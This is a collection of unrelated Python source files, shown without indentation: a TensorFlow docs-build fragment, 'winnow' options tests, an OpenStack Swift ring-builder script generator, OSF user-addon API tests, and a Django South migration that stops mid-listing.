# Write the api docs.
parser_config = self.make_parser_config(visitor, reference_resolver,
guide_index, flags.base_dir)
output_dir = os.path.join(flags.output_dir, 'api_docs/python')
write_docs(
output_dir,
parser_config,
yaml_toc=self.yaml_toc,
root_title=root_title,
search_hints=getattr(flags, 'search_hints', True),
site_api_path=getattr(flags, 'site_api_path', ''))
# Replace all the @{} references in files under `FLAGS.src_dir`
replace_refs(flags.src_dir, flags.output_dir, reference_resolver, '*.md')
# Fix the tags in the guide dir.
guide_dir = os.path.join(flags.output_dir, 'api_guides/python')
if os.path.exists(guide_dir):
update_id_tags_inplace(guide_dir)
# Report all errors found by the reference resolver, and return the error
# code.
parser_config.reference_resolver.log_errors()
return parser_config.reference_resolver.num_errors()
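# Minimal sketch of how a project-specific build script is expected to drive
# DocGenerator (the module tuple and paths below are placeholders):
#
#   doc_generator = DocGenerator()
#   doc_generator.add_output_dir_argument()
#   doc_generator.add_src_dir_argument()
#   doc_generator.add_base_dir_argument('/path/to/project')
#   doc_generator.set_py_modules([('tf', tf)])
#   flags = doc_generator.parse_known_args()
#   sys.exit(doc_generator.build(flags))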
|
|
import unittest
from winnow.utils import json_dumps, json_loads
import winnow
from winnow.models.base import WinnowVersion
from winnow.utils import deep_copy_dict as deepcopy
from winnow.exceptions import OptionsExceptionFailedValidation
from decimal import Decimal
from db import MockKVStore
BASE_PRODUCT = {u"name": u"table",
u"description": u"This is a very nice table",
u"options":{
u"color": [u"red", u"green", u"blue"],
u"size": [u"big", u"small"],
u"tool": [u"cnc", u"laser"],
u"material": [u"wood", u"metal", u"plastic"]
}
}
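# Rough intuition for the assertions below (as exercised by these tests, not a
# full specification of winnow): winnow.allows(a, b) holds when, for every
# option key the two documents share, b's values are a subset of a's; keys
# missing from either side are treated as unconstrained. So a configuration
# with {"color": ["red", "green"]} is allowed by BASE_PRODUCT, while one with
# {"color": "purple"} is not.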
class TestValidSieve(unittest.TestCase):
def setUp(self):
self.db = MockKVStore()
def test_valid_sieve(self):
version = WinnowVersion.add_doc(self.db, BASE_PRODUCT, {})
class TestSieveAllows(unittest.TestCase):
def setUp(self):
self.db = MockKVStore()
self.base_version = WinnowVersion.add_doc(self.db, BASE_PRODUCT, {})
def test_allows_subset(self):
configured_option = deepcopy(BASE_PRODUCT)
configured_option[u"options"][u"color"] = u"red"
configured_version = WinnowVersion.add_doc(self.db, configured_option, {})
self.assertTrue(winnow.allows(self.base_version, configured_version))
configured_option = deepcopy(BASE_PRODUCT)
configured_option[u"options"][u"color"] = [u"red", u"green"]
# the values for given keys are a subset
configured_version = WinnowVersion.add_doc(self.db, configured_option, {})
self.assertTrue(winnow.allows(self.base_version, configured_version))
self.assertFalse(winnow.allows(configured_version, self.base_version))
self.assertFalse(winnow.is_allowed_by(self.base_version, configured_version))
self.assertTrue(winnow.is_allowed_by(configured_version, self.base_version))
configured_option = deepcopy(BASE_PRODUCT)
configured_option[u"options"][u"color"] = [u"red", u"green"]
configured_option[u"options"][u"tool"] = [u"cnc"]
configured_version = WinnowVersion.add_doc(self.db, configured_option, {})
self.assertTrue(winnow.allows(self.base_version, configured_version))
def test_allows_subset_without_a_key(self):
configured_option = deepcopy(BASE_PRODUCT)
del configured_option[u"options"][u"color"]
configured_version = WinnowVersion.add_doc(self.db, configured_option, {})
self.assertTrue(winnow.allows(configured_version, self.base_version))
def test_allows_subset_with_an_extra_key(self):
configured_option = deepcopy(BASE_PRODUCT)
configured_option[u"options"][u"wheels"] = [u"big", u"small"]
configured_version = WinnowVersion.add_doc(self.db, configured_option, {})
self.assertTrue(winnow.allows(self.base_version, configured_version))
self.assertTrue(self.base_version.allows(configured_version))
def test_allows_fails(self):
configured_option = deepcopy(BASE_PRODUCT)
configured_option[u"options"][u"color"] = u"purple"
configured_version = WinnowVersion.add_doc(self.db, configured_option, {})
self.assertFalse(winnow.allows(self.base_version, configured_version))
self.assertFalse(self.base_version.allows(configured_version))
class TestSieveMerge(unittest.TestCase):
def setUp(self):
self.db = MockKVStore()
self.base_version = WinnowVersion.add_doc(self.db, BASE_PRODUCT, {})
def test_does_a_merge(self):
other_dict = {u"name": u"something",
u"description": u"these are other options",
u"options":{
u"color": [u"red", u"blue"],
u"size": [u"big", u"medium", u"small"],
u"tool": [u"cnc", u"laser", u"plaster"],
u"days": [u"tuesday", u"thursday"],
u"drinks": [u"beer", u"coffee"],
u"snacks": [u"crisps", u"cheese", u"apple"]
}
}
expected = {u"name": u"table",
u"description": u"This is a very nice table",
u"options":{
u"color": [u"blue", u"red"],
u"size": [u"big", u"small"],
u"tool": [u"cnc", u"laser"],
u"material": [u"metal", u"plastic", u"wood"],
u"days": [u"thursday", u"tuesday"],
u"drinks": [u"beer", u"coffee"],
u"snacks": [u"apple", u"cheese", u"crisps"]
}
}
other_version = WinnowVersion.add_doc(self.db, other_dict, {})
merged = WinnowVersion.merged(self.db, BASE_PRODUCT, {}, self.base_version, other_version)
self.maxDiff = None
self.assertEqual(merged.kwargs[u"doc"], expected)
def test_match(self):
configured_product_1 = {u"name": u"cat",
u"description": u"This is a very nice table",
u"options":{
u"color": u"red",
u"size": u"big"
}
}
configured_product_2 = {u"name": u"dog",
u"description": u"This is a very nice table",
u"options":{
u"color": u"red",
}
}
configured_product_3 = {u"name": u"fish",
u"description": u"This is a very nice table",
u"options":{
u"color": u"red",
u"size": u"old"
}
}
configured_product_4 = {u"name": u"goat",
u"description": u"This is a very nice table",
u"options":{
u"color": [u"red", u"green"],
u"size": u"small"
}
}
possible = [WinnowVersion.add_doc(self.db, configured_product_1, {}),
WinnowVersion.add_doc(self.db, configured_product_2, {}),
WinnowVersion.add_doc(self.db, configured_product_3, {}),
WinnowVersion.add_doc(self.db, configured_product_4, {})]
found = self.base_version.filter_allows(possible)
self.assertEqual(set([f.kwargs[u"doc"][u"name"] for f in found]), set([u'cat', u'dog', u'goat']))
|
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
# Copyright (c) 2014, Blue Box Group, Inc.
# Copyright (c) 2014, Craig Tracey <[email protected]>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import glob
import logging
import os
import shutil
import stat
import subprocess
import tempfile
from fabric.api import execute, parallel, put
from netifaces import interfaces, ifaddresses, AF_INET
from utils import RING_TYPES, get_devices
LOG = logging.getLogger(__name__)
class SwiftRingsDefinition(object):
def __init__(self, data=None):
self.ring_builder_cmd = "swift-ring-builder"
self.ports = {
'object': 6000,
'container': 6001,
'account': 6002,
}
self.replicas = 3
self.min_part_hours = 1
self.zones = {}
# Area to build new or update existing rings
self.workspace = tempfile.mkdtemp()
if data:
self.__dict__.update(data)
def __del__(self):
shutil.rmtree(self.workspace)
def __repr__(self):
return str(self.__dict__)
def _ring_create_command(self, ringtype):
return "%s %s/%s.builder create %d %d %d" % (
self.ring_builder_cmd, self.workspace, ringtype,
int(self.part_power), int(self.replicas),
int(self.min_part_hours))
def _ring_add_command(self, ringtype, zone, host, port, disk,
metadata, weight):
return "%s %s/%s.builder add %s-%s:%d/%s_%s %d" % (
self.ring_builder_cmd, self.workspace, ringtype, zone, host,
int(port), disk, metadata, int(weight))
def _ring_rebalance_command(self, ringtype, force=False):
if not force:
return "%s %s/%s.builder rebalance" % (
self.ring_builder_cmd, self.workspace, ringtype)
else:
return "%s %s/%s.builder rebalance --force" % (
self.ring_builder_cmd, self.workspace, ringtype)
def _ring_setweight_command(self, ringtype, zone, host, port,
disk, weight):
return "%s %s/%s.builder set_weight %s-%s:%d/%s %d" % (
self.ring_builder_cmd, self.workspace, ringtype, zone, host,
int(port), disk, int(weight))
def _ring_remove_command(self, ringtype, zone, host, port, disk):
return "%s %s/%s.builder remove %s-%s:%d/%s" % (
self.ring_builder_cmd, self.workspace, ringtype, zone, host,
int(port), disk)
def _ring_search_command(self, ringtype, zone, host, port, disk):
return "%s %s/%s.builder search %s-%s:%d/%s" % (
self.ring_builder_cmd, self.workspace, ringtype, zone, host,
int(port), disk)
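    # Illustrative command strings produced by the builders above (the
    # workspace path, zone, host, disk and weight are placeholders, and
    # part_power comes from the input definition):
    #
    #   _ring_create_command('object')
    #     -> "swift-ring-builder <workspace>/object.builder create 18 3 1"
    #   _ring_add_command('object', 'z1', '10.0.0.1', 6000, 'sdb', 'meta1', 100)
    #     -> "swift-ring-builder <workspace>/object.builder add
    #         z1-10.0.0.1:6000/sdb_meta1 100"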
@property
def nodes(self):
ret = set()
if self.zones and isinstance(self.zones, dict):
for zone, nodes in self.zones.iteritems():
ret.update(nodes.keys())
return ret
def generate_commands(self, rebalance=True, meta=None):
commands = []
ring_disks = get_devices(self.zones, metadata=meta)
for ringtype in RING_TYPES:
builder_present = os.path.exists("%s/%s.builder" %
(self.workspace, ringtype))
if not builder_present:
commands.append(self._ring_create_command(ringtype))
for zone, devices in ring_disks[ringtype].iteritems():
for device in devices:
port = self.ports[ringtype]
weight = device['weight']
disk = device['device']
node = device['ip']
metadata = device['metadata']
                    # If the builder is new, or the device is not yet in the
                    # ring, add the device to the ring. Otherwise remove the
                    # device when its weight is being set to 0, or simply
                    # update its weight.
if not builder_present or \
not self._is_devpresent(ringtype, zone, node,
port, disk):
cmd = self._ring_add_command(ringtype, zone,
node, port,
disk, metadata,
weight)
else:
if int(weight) == 0:
cmd = self._ring_remove_command(ringtype,
zone, node,
port, disk)
else:
                        # Always set the device weight; setting the weight to
                        # its current value was verified not to cause
                        # partitions to reassign.
cmd = self._ring_setweight_command(ringtype,
zone,
node,
port,
disk,
weight)
commands.append(cmd)
if rebalance:
commands.append(self._ring_rebalance_command(ringtype))
return commands
def rebalance_commands(self):
commands = []
for ringtype in RING_TYPES:
builder_path = "%s/%s.builder" % (self.workspace, ringtype)
if not os.path.exists(builder_path):
raise Exception("Could not find '%s'" % builder_path)
commands.append(self._ring_rebalance_command(ringtype,
force=True))
return commands
def _update_workspace(self, outdir):
        # Copy the builder files if all three exist; otherwise new ones are created
if os.path.exists(os.path.join(outdir, "account.builder")) and \
os.path.exists(os.path.join(outdir, "container.builder")) and \
os.path.exists(os.path.join(outdir, "object.builder")):
for filename in glob.glob(os.path.join(outdir, "*.builder")):
shutil.copy(filename, self.workspace)
def generate_script(self, outdir, name='ring_builder.sh',
rebalance=True, meta=None, rebalance_only=False):
self._update_workspace(outdir)
commands = ["#!/bin/bash\n"]
if not rebalance_only:
commands = commands + self.generate_commands(rebalance,
meta)
else:
commands = commands + self.rebalance_commands()
outfile = os.path.join(self.workspace, name)
        with open(outfile, 'w') as f:
            for command in commands:
                f.write("%s\n" % command)
st = os.stat(outfile)
os.chmod(outfile, st.st_mode | stat.S_IEXEC)
return outfile
def _is_devpresent(self, ringtype, zone, node, port, disk):
command = self._ring_search_command(ringtype, zone, node,
port, disk)
rc = subprocess.call(command, shell=True)
return rc == 0
def ip4_addresses():
ips = []
for interface in interfaces():
addresses = ifaddresses(interface)
if addresses and AF_INET in addresses:
for link in addresses[AF_INET]:
ips.append(link['addr'])
return ips
def ringsdef_helper(config, metadata, outputdir, rebalance_only=False):
ringsdef = SwiftRingsDefinition(config)
build_script = ringsdef.generate_script(outdir=outputdir,
meta=metadata,
rebalance_only=rebalance_only)
subprocess.call(build_script)
tempfiles = os.path.join(ringsdef.workspace, "*")
execute(_fab_copy_swift_directory, tempfiles, outputdir,
hosts=ringsdef.nodes)
return ringsdef.nodes
@parallel
def _fab_copy_swift_directory(local_files, remote_dir):
put(local_files, remote_dir, mirror_local_mode=True)
|
|
# -*- coding: utf-8 -*-
import abc
from nose.tools import * # noqa:
import re
import pytest
from api.base.settings.defaults import API_BASE
from tests.base import ApiAddonTestCase
from osf_tests.factories import AuthUserFactory
from addons.bitbucket.tests.factories import BitbucketAccountFactory
from addons.box.tests.factories import BoxAccountFactory
from addons.dataverse.tests.factories import DataverseAccountFactory
from addons.dropbox.tests.factories import DropboxAccountFactory
from addons.github.tests.factories import GitHubAccountFactory
from addons.googledrive.tests.factories import GoogleDriveAccountFactory
from addons.mendeley.tests.factories import MendeleyAccountFactory
from addons.owncloud.tests.factories import OwnCloudAccountFactory
from addons.s3.tests.factories import S3AccountFactory
from addons.zotero.tests.factories import ZoteroAccountFactory
class UserAddonListMixin(object):
def set_setting_list_url(self):
self.setting_list_url = '/{}users/{}/addons/'.format(
API_BASE, self.user._id
)
def test_settings_list_GET_returns_user_settings_if_present(self):
wrong_type = self.should_expect_errors()
res = self.app.get(
self.setting_list_url,
auth=self.user.auth)
if not wrong_type:
addon_data = res.json['data'][0]
assert_true(addon_data['attributes']['user_has_auth'])
assert_in(
self.node._id, addon_data['links']['accounts'][self.account_id]['nodes_connected'][0])
if wrong_type:
assert_equal(res.status_code, 200)
assert_equal(res.json['data'], [])
def test_settings_list_GET_returns_none_if_absent(self):
try:
if self.user.external_accounts.count():
self.user.external_accounts.clear()
self.user.delete_addon(self.short_name, auth=self.auth)
except ValueError:
# If addon was mandatory -- OSFStorage
pass
res = self.app.get(
self.setting_list_url,
auth=self.user.auth)
addon_data = res.json['data']
assert_equal(addon_data, [])
def test_settings_list_raises_error_if_PUT(self):
res = self.app.put_json_api(
self.setting_list_url,
{
'id': self.short_name,
'type': 'user-addons'
},
auth=self.user.auth,
expect_errors=True)
assert_equal(res.status_code, 405)
def test_settings_list_raises_error_if_PATCH(self):
res = self.app.patch_json_api(
self.setting_list_url,
{
'id': self.short_name,
'type': 'user-addons'
},
auth=self.user.auth,
expect_errors=True)
assert_equal(res.status_code, 405)
def test_settings_list_raises_error_if_DELETE(self):
res = self.app.delete(
self.setting_list_url,
auth=self.user.auth,
expect_errors=True)
assert_equal(res.status_code, 405)
def test_settings_list_raises_error_if_nonauthenticated(self):
res = self.app.get(
self.setting_list_url,
expect_errors=True)
assert_equal(res.status_code, 401)
def test_settings_list_user_cannot_view_other_user(self):
other_user = AuthUserFactory()
res = self.app.get(
self.setting_list_url,
auth=other_user.auth,
expect_errors=True)
assert_equal(res.status_code, 403)
class UserAddonDetailMixin(object):
def set_setting_detail_url(self):
self.setting_detail_url = '/{}users/{}/addons/{}/'.format(
API_BASE, self.user._id, self.short_name
)
def test_settings_detail_GET_returns_user_settings_if_present(self):
wrong_type = self.should_expect_errors()
res = self.app.get(
self.setting_detail_url,
auth=self.user.auth,
expect_errors=wrong_type)
if not wrong_type:
addon_data = res.json['data']
assert_true(addon_data['attributes']['user_has_auth'])
assert_in(
self.node._id,
addon_data['links']['accounts'][self.account_id]['nodes_connected'][0]
)
if wrong_type:
assert_equal(res.status_code, 404)
def test_settings_detail_GET_raises_error_if_absent(self):
wrong_type = self.should_expect_errors()
try:
if self.user.external_accounts.count():
self.user.external_accounts.clear()
self.user.delete_addon(self.short_name, auth=self.auth)
except ValueError:
# If addon was mandatory -- OSFStorage
pass
res = self.app.get(
self.setting_detail_url,
auth=self.user.auth,
expect_errors=True)
assert_equal(res.status_code, 404)
if not wrong_type:
assert_in(
'Requested addon not enabled',
res.json['errors'][0]['detail'])
if wrong_type:
assert re.match(
r'Requested addon un(available|recognized)',
(res.json['errors'][0]['detail']))
def test_settings_detail_raises_error_if_PUT(self):
res = self.app.put_json_api(self.setting_detail_url, {
'id': self.short_name,
'type': 'user-addon-detail'
}, auth=self.user.auth,
expect_errors=True)
assert_equal(res.status_code, 405)
def test_settings_detail_raises_error_if_PATCH(self):
res = self.app.patch_json_api(self.setting_detail_url, {
'id': self.short_name,
'type': 'user-addon-detail'
}, auth=self.user.auth,
expect_errors=True)
assert_equal(res.status_code, 405)
def test_settings_detail_raises_error_if_DELETE(self):
res = self.app.delete(
self.setting_detail_url,
auth=self.user.auth,
expect_errors=True)
assert_equal(res.status_code, 405)
def test_settings_detail_raises_error_if_nonauthenticated(self):
res = self.app.get(
self.setting_detail_url,
expect_errors=True)
assert_equal(res.status_code, 401)
def test_settings_detail_user_cannot_view_other_user(self):
other_user = AuthUserFactory()
res = self.app.get(
self.setting_detail_url,
auth=other_user.auth,
expect_errors=True)
assert_equal(res.status_code, 403)
class UserAddonAccountListMixin(object):
def set_account_list_url(self):
self.account_list_url = '/{}users/{}/addons/{}/accounts/'.format(
API_BASE, self.user._id, self.short_name
)
def test_account_list_GET_returns_accounts_if_present(self):
wrong_type = self.should_expect_errors()
res = self.app.get(
self.account_list_url,
auth=self.user.auth,
expect_errors=wrong_type)
if not wrong_type:
addon_data = res.json['data'][0]
assert_equal(addon_data['id'], self.account._id)
assert_equal(
addon_data['attributes']['display_name'],
self.account.display_name)
assert_equal(
addon_data['attributes']['provider'],
self.account.provider)
assert_equal(
addon_data['attributes']['profile_url'],
self.account.profile_url)
if wrong_type:
assert_equal(res.status_code, 404)
def test_account_list_raises_error_if_absent(self):
wrong_type = self.should_expect_errors()
try:
if self.user.external_accounts.count():
self.user.external_accounts.clear()
self.user.delete_addon(self.short_name, auth=self.auth)
except ValueError:
# If addon was mandatory -- OSFStorage
pass
res = self.app.get(
self.account_list_url,
auth=self.user.auth,
expect_errors=True)
assert_equal(res.status_code, 404)
if not wrong_type:
assert_in(
'Requested addon not enabled',
res.json['errors'][0]['detail'])
if wrong_type:
assert re.match(
r'Requested addon un(available|recognized)',
(res.json['errors'][0]['detail']))
def test_account_list_raises_error_if_PUT(self):
res = self.app.put_json_api(self.account_list_url, {
'id': self.short_name,
'type': 'user-external_accounts'
}, auth=self.user.auth,
expect_errors=True)
assert_equal(res.status_code, 405)
def test_account_list_raises_error_if_PATCH(self):
res = self.app.patch_json_api(self.account_list_url, {
'id': self.short_name,
'type': 'user-external_accounts'
}, auth=self.user.auth,
expect_errors=True)
assert_equal(res.status_code, 405)
def test_account_list_raises_error_if_DELETE(self):
res = self.app.delete(
self.account_list_url,
auth=self.user.auth,
expect_errors=True)
assert_equal(res.status_code, 405)
def test_account_list_raises_error_if_nonauthenticated(self):
res = self.app.get(
self.account_list_url,
expect_errors=True)
assert_equal(res.status_code, 401)
def test_account_list_user_cannot_view_other_user(self):
other_user = AuthUserFactory()
res = self.app.get(
self.account_list_url,
auth=other_user.auth,
expect_errors=True)
assert_equal(res.status_code, 403)
class UserAddonAccountDetailMixin(object):
def set_account_detail_url(self):
self.account_detail_url = '/{}users/{}/addons/{}/accounts/{}/'.format(
API_BASE, self.user._id, self.short_name, self.account_id
)
def test_account_detail_GET_returns_account_if_enabled(self):
wrong_type = self.should_expect_errors()
res = self.app.get(
self.account_detail_url,
auth=self.user.auth,
expect_errors=wrong_type)
if not wrong_type:
addon_data = res.json['data']
assert_equal(addon_data['id'], self.account._id)
assert_equal(
addon_data['attributes']['display_name'],
self.account.display_name)
assert_equal(
addon_data['attributes']['provider'],
self.account.provider)
assert_equal(
addon_data['attributes']['profile_url'],
self.account.profile_url)
if wrong_type:
assert_equal(res.status_code, 404)
def test_account_detail_raises_error_if_not_found(self):
wrong_type = self.should_expect_errors()
try:
if self.user.external_accounts.count():
self.user.external_accounts.clear()
self.user.delete_addon(self.short_name, auth=self.auth)
except ValueError:
# If addon was mandatory -- OSFStorage
pass
res = self.app.get(
self.account_detail_url,
auth=self.user.auth,
expect_errors=True)
assert_equal(res.status_code, 404)
if not wrong_type:
assert_in(
'Requested addon not enabled',
res.json['errors'][0]['detail'])
if wrong_type:
assert re.match(
r'Requested addon un(available|recognized)',
(res.json['errors'][0]['detail']))
def test_account_detail_raises_error_if_PUT(self):
res = self.app.put_json_api(self.account_detail_url, {
'id': self.short_name,
'type': 'user-external_account-detail'
}, auth=self.user.auth,
expect_errors=True)
assert_equal(res.status_code, 405)
def test_account_detail_raises_error_if_PATCH(self):
res = self.app.patch_json_api(self.account_detail_url, {
'id': self.short_name,
'type': 'user-external_account-detail'
}, auth=self.user.auth,
expect_errors=True)
assert_equal(res.status_code, 405)
def test_account_detail_raises_error_if_DELETE(self):
res = self.app.delete(
self.account_detail_url,
auth=self.user.auth,
expect_errors=True)
assert_equal(res.status_code, 405)
def test_account_detail_raises_error_if_nonauthenticated(self):
res = self.app.get(
self.account_detail_url,
expect_errors=True)
assert_equal(res.status_code, 401)
def test_account_detail_user_cannot_view_other_user(self):
other_user = AuthUserFactory()
res = self.app.get(
self.account_detail_url,
auth=other_user.auth,
expect_errors=True)
assert_equal(res.status_code, 403)
class UserAddonTestSuiteMixin(
UserAddonListMixin,
UserAddonDetailMixin,
UserAddonAccountListMixin,
UserAddonAccountDetailMixin):
def set_urls(self):
self.set_setting_list_url()
self.set_setting_detail_url()
self.set_account_list_url()
self.set_account_detail_url()
def should_expect_errors(self, success_types=('OAUTH', )):
return self.addon_type not in success_types
class UserOAuthAddonTestSuiteMixin(UserAddonTestSuiteMixin):
addon_type = 'OAUTH'
@abc.abstractproperty
def AccountFactory(self):
pass
class UserUnmanageableAddonTestSuiteMixin(UserAddonTestSuiteMixin):
addon_type = 'UNMANAGEABLE'
# UNMANAGEABLE
class TestUserForwardAddon(
UserUnmanageableAddonTestSuiteMixin,
ApiAddonTestCase):
short_name = 'forward'
class TestUserOsfStorageAddon(
UserUnmanageableAddonTestSuiteMixin,
ApiAddonTestCase):
short_name = 'osfstorage'
class TestUserTwoFactorAddon(
UserUnmanageableAddonTestSuiteMixin,
ApiAddonTestCase):
short_name = 'twofactor'
class TestUserWikiAddon(UserUnmanageableAddonTestSuiteMixin, ApiAddonTestCase):
short_name = 'wiki'
# OAUTH
class TestUserBitbucketAddon(UserOAuthAddonTestSuiteMixin, ApiAddonTestCase):
short_name = 'bitbucket'
AccountFactory = BitbucketAccountFactory
class TestUserBoxAddon(UserOAuthAddonTestSuiteMixin, ApiAddonTestCase):
short_name = 'box'
AccountFactory = BoxAccountFactory
class TestUserDataverseAddon(UserOAuthAddonTestSuiteMixin, ApiAddonTestCase):
short_name = 'dataverse'
AccountFactory = DataverseAccountFactory
class TestUserDropboxAddon(UserOAuthAddonTestSuiteMixin, ApiAddonTestCase):
short_name = 'dropbox'
AccountFactory = DropboxAccountFactory
class TestUserGitHubAddon(UserOAuthAddonTestSuiteMixin, ApiAddonTestCase):
short_name = 'github'
AccountFactory = GitHubAccountFactory
class TestUserGoogleDriveAddon(UserOAuthAddonTestSuiteMixin, ApiAddonTestCase):
short_name = 'googledrive'
AccountFactory = GoogleDriveAccountFactory
class TestUserMendeleyAddon(UserOAuthAddonTestSuiteMixin, ApiAddonTestCase):
short_name = 'mendeley'
AccountFactory = MendeleyAccountFactory
class TestUserS3Addon(UserOAuthAddonTestSuiteMixin, ApiAddonTestCase):
short_name = 's3'
AccountFactory = S3AccountFactory
class TestUserZoteroAddon(UserOAuthAddonTestSuiteMixin, ApiAddonTestCase):
short_name = 'zotero'
AccountFactory = ZoteroAccountFactory
class TestUserOwnCloudAddon(UserOAuthAddonTestSuiteMixin, ApiAddonTestCase):
short_name = 'owncloud'
AccountFactory = OwnCloudAccountFactory
@pytest.mark.skip('Unskip when figshare v2 addon is ported')
class TestUserFigshareAddon(UserOAuthAddonTestSuiteMixin, ApiAddonTestCase):
short_name = 'figshare'
# AccountFactory = FigshareAccountFactory
class TestUserInvalidAddon(UserAddonTestSuiteMixin, ApiAddonTestCase):
addon_type = 'INVALID'
short_name = 'fake'
|
|
# -*- coding: utf-8 -*-
from south.utils import datetime_utils as datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
depends_on = (
("account", "0001_initial"),
)
def forwards(self, orm):
# Adding model 'Task'
db.create_table(u'task_task', (
(u'id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('name', self.gf('django.db.models.fields.CharField')(max_length=128)),
('description', self.gf('django.db.models.fields.TextField')(blank=True)),
('application', self.gf('django.db.models.fields.related.ForeignKey')(related_name='tasks', to=orm['core.Application'])),
))
db.send_create_signal(u'task', ['Task'])
# Adding unique constraint on 'Task', fields ['application', 'name']
db.create_unique(u'task_task', ['application_id', 'name'])
# Adding model 'TaskParameter'
db.create_table(u'task_taskparameter', (
(u'id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('task', self.gf('django.db.models.fields.related.ForeignKey')(related_name='parameters', to=orm['task.Task'])),
('name', self.gf('django.db.models.fields.CharField')(max_length=128)),
('default_value', self.gf('django.db.models.fields.CharField')(max_length=128)),
('description', self.gf('django.db.models.fields.TextField')(blank=True)),
('order', self.gf('django.db.models.fields.IntegerField')()),
))
db.send_create_signal(u'task', ['TaskParameter'])
# Adding model 'TaskCommand'
db.create_table(u'task_taskcommand', (
(u'id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('task', self.gf('django.db.models.fields.related.ForeignKey')(related_name='commands', to=orm['task.Task'])),
('command', self.gf('django.db.models.fields.TextField')()),
('order', self.gf('django.db.models.fields.IntegerField')()),
))
db.send_create_signal(u'task', ['TaskCommand'])
# Adding M2M table for field roles on 'TaskCommand'
m2m_table_name = db.shorten_name(u'task_taskcommand_roles')
db.create_table(m2m_table_name, (
('id', models.AutoField(verbose_name='ID', primary_key=True, auto_created=True)),
('taskcommand', models.ForeignKey(orm[u'task.taskcommand'], null=False)),
('serverrole', models.ForeignKey(orm[u'core.serverrole'], null=False))
))
db.create_unique(m2m_table_name, ['taskcommand_id', 'serverrole_id'])
# Adding model 'Execution'
db.create_table(u'task_execution', (
(u'id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('task', self.gf('django.db.models.fields.related.ForeignKey')(related_name='executions', to=orm['task.Task'])),
('time_created', self.gf('django.db.models.fields.DateTimeField')(auto_now_add=True, blank=True)),
('time_start', self.gf('django.db.models.fields.DateTimeField')(null=True, blank=True)),
('time_end', self.gf('django.db.models.fields.DateTimeField')(null=True, blank=True)),
('time', self.gf('django.db.models.fields.IntegerField')(null=True, blank=True)),
('environment', self.gf('django.db.models.fields.related.ForeignKey')(related_name='executions', to=orm['core.Environment'])),
('user', self.gf('django.db.models.fields.related.ForeignKey')(related_name='executions', to=orm['account.CustomUser'])),
('status', self.gf('django.db.models.fields.IntegerField')(default=3)),
))
db.send_create_signal(u'task', ['Execution'])
# Adding model 'ExecutionParameter'
db.create_table(u'task_executionparameter', (
(u'id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('execution', self.gf('django.db.models.fields.related.ForeignKey')(related_name='parameters', to=orm['task.Execution'])),
('name', self.gf('django.db.models.fields.CharField')(max_length=128)),
('value', self.gf('django.db.models.fields.CharField')(max_length=128)),
))
db.send_create_signal(u'task', ['ExecutionParameter'])
# Adding model 'ExecutionCommand'
db.create_table(u'task_executioncommand', (
(u'id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('execution', self.gf('django.db.models.fields.related.ForeignKey')(related_name='commands', to=orm['task.Execution'])),
('command', self.gf('django.db.models.fields.TextField')()),
))
db.send_create_signal(u'task', ['ExecutionCommand'])
# Adding M2M table for field roles on 'ExecutionCommand'
m2m_table_name = db.shorten_name(u'task_executioncommand_roles')
db.create_table(m2m_table_name, (
('id', models.AutoField(verbose_name='ID', primary_key=True, auto_created=True)),
('executioncommand', models.ForeignKey(orm[u'task.executioncommand'], null=False)),
('serverrole', models.ForeignKey(orm[u'core.serverrole'], null=False))
))
db.create_unique(m2m_table_name, ['executioncommand_id', 'serverrole_id'])
# Adding model 'ExecutionCommandServer'
db.create_table(u'task_executioncommandserver', (
(u'id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('execution_command', self.gf('django.db.models.fields.related.ForeignKey')(related_name='servers', to=orm['task.ExecutionCommand'])),
('status', self.gf('django.db.models.fields.IntegerField')(default=3)),
('time_start', self.gf('django.db.models.fields.DateTimeField')(null=True, blank=True)),
('time_end', self.gf('django.db.models.fields.DateTimeField')(null=True, blank=True)),
('time', self.gf('django.db.models.fields.IntegerField')(null=True, blank=True)),
('return_code', self.gf('django.db.models.fields.IntegerField')(null=True, blank=True)),
('server', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['core.Server'])),
('output', self.gf('django.db.models.fields.TextField')(blank=True)),
))
db.send_create_signal(u'task', ['ExecutionCommandServer'])
# Adding model 'ExecutionLiveLog'
db.create_table(u'task_executionlivelog', (
(u'id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('execution', self.gf('django.db.models.fields.related.ForeignKey')(related_name='live_logs', to=orm['task.Execution'])),
('event', self.gf('django.db.models.fields.CharField')(max_length=128)),
('data', self.gf('django.db.models.fields.TextField')(blank=True)),
))
db.send_create_signal(u'task', ['ExecutionLiveLog'])
def backwards(self, orm):
# Removing unique constraint on 'Task', fields ['application', 'name']
db.delete_unique(u'task_task', ['application_id', 'name'])
# Deleting model 'Task'
db.delete_table(u'task_task')
# Deleting model 'TaskParameter'
db.delete_table(u'task_taskparameter')
# Deleting model 'TaskCommand'
db.delete_table(u'task_taskcommand')
# Removing M2M table for field roles on 'TaskCommand'
db.delete_table(db.shorten_name(u'task_taskcommand_roles'))
# Deleting model 'Execution'
db.delete_table(u'task_execution')
# Deleting model 'ExecutionParameter'
db.delete_table(u'task_executionparameter')
# Deleting model 'ExecutionCommand'
db.delete_table(u'task_executioncommand')
# Removing M2M table for field roles on 'ExecutionCommand'
db.delete_table(db.shorten_name(u'task_executioncommand_roles'))
# Deleting model 'ExecutionCommandServer'
db.delete_table(u'task_executioncommandserver')
# Deleting model 'ExecutionLiveLog'
db.delete_table(u'task_executionlivelog')
models = {
u'account.customuser': {
'Meta': {'object_name': 'CustomUser'},
'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'email': ('django.db.models.fields.EmailField', [], {'unique': 'True', 'max_length': '254'}),
